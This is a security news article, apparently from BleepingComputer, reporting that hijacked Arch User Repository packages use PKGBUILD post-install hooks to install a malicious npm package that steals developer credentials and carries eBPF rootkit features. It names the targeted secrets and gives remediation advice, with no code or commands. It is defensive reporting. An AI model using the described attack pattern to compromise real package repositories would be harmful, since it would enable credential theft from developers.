Compromised Arch Linux Packages Distribute Malware
A recent report from the Independent Federated Intelligence Network (IFIN) reveals that more than 400 packages in the Arch User Repository (AUR) have been compromised to distribute a Linux rootkit and infostealer malware. This malware targets credentials and access tokens, posing a significant threat to users of the Arch Linux distribution.
The AUR is a community-maintained repository that provides the latest versions of software, drivers, and the kernel for Arch-based distributions. However, it is not a vetted space, and threat actors can use it to push malware through packages that change ownership without anyone noticing.
Malicious Packages and Scripts
According to IFIN member Michael Taggart, the compromised packages are modified with preinstall scripts that download and execute a malicious npm package called atomic-lockfile. Independent security researcher Whanos notes that one sample of the atomic-lockfile included a Linux ELF payload named deps, which was a "credential stealer with optional root-only eBPF [extended Berkeley Packet Filter] rootkit capabilities."
It is designed for developer workstations and build environments. It targets browser and Electron application data, Slack, Microsoft Teams, Discord, GitHub, npm, Vault, Docker/Podman, SSH, VPN material, shell histories, and other local developer secrets.
With eBPF technology present, the malware can run inside the kernel with elevated privileges and hide local processes. Supply-chain management company Sonatype also published a report on a campaign targeting the AUR repository and delivering the malicious atomic-lockfile npm package, but using a different method.
Method of Compromise
Sonatype researchers say that the threat actor hijacked at least 20 orphaned packages on AUR and pushed atomic-lockfile by modifying the PKGBUILD file - a Bash script with the build information needed by Arch Linux packages. The attacker added a post-install script to invoke npm and retrieve the malicious package.
- The modified packages add a post-install script that invokes npm and installs atomic-lockfile during package installation.
- The npm package installed a Linux executable with references to an eBPF rootkit that could hide processes, files, and network interfaces.
- The Linux binary indicates that it has infostealer functionality, targeting the following types of sensitive information:
- GitHub credentials
- SSH artifacts
- HashiCorp Vault tokens
- Browser cookie databases
- Slack data
- Discord data
- Microsoft Teams data
- Telegram data
Sonatype determined that the binary can archive data, handle multi-part files, and perform HTTP uploads, so the functionality for a typical exfiltration mechanism is present.
Response and Recommendations
AUR maintainers are working to identify and remove all malicious commits, and to ban the accounts pushing them. In a message to the community, Arch Linux package maintainer Jonathan Grotelüschen urged users to report any malicious package they find.
As a general rule, it’s recommended to only trust projects with frequent updates and an active community around them. Arch users are advised to review the list of affected packages and look for the indicators of compromise provided in the report from Whanos. Michael Taggart also pointed to a script that checks for the atomic-lockfile malware on the system.
If compromised packages are found, users should rotate all credentials and consider reinstalling Arch from scratch, since a rootkit may survive normal cleaning efforts.
Source: BleepingComputer